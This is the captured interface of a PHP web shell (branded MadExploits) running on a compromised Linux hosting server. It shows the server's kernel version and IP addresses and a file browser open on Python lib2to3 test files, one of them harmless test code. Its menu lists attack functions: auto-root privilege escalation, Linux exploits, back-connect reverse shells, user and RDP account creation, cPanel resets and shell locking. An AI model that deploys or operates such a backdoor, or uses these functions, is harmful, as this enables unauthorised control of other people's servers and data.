Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.141.38.5
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
python35 /
lib /
python3.5 /
lib2to3 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
__init__.py
184
B
-rw-r--r--
__main__.py
58
B
-rw-r--r--
pytree_idempotency.py
2.4
KB
-rwxr-xr-x
support.py
1.7
KB
-rw-r--r--
test_all_fixers.py
624
B
-rw-r--r--
test_fixers.py
118.46
KB
-rw-r--r--
test_main.py
5.61
KB
-rw-r--r--
test_parser.py
12.36
KB
-rw-r--r--
test_pytree.py
16.06
KB
-rw-r--r--
test_refactor.py
11.59
KB
-rw-r--r--
test_util.py
20.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_all_fixers.py
"""Tests that run all fixer modules over an input stream. This has been broken out into its own test module because of its running time. """ # Author: Collin Winter # Python imports import unittest import test.support # Local imports from lib2to3 import refactor from . import support @test.support.requires_resource('cpu') class Test_all(support.TestCase): def setUp(self): self.refactor = support.get_refactorer() def test_all_project_files(self): for filepath in support.all_project_files(): self.refactor.refactor_file(filepath) if __name__ == '__main__': unittest.main()
Close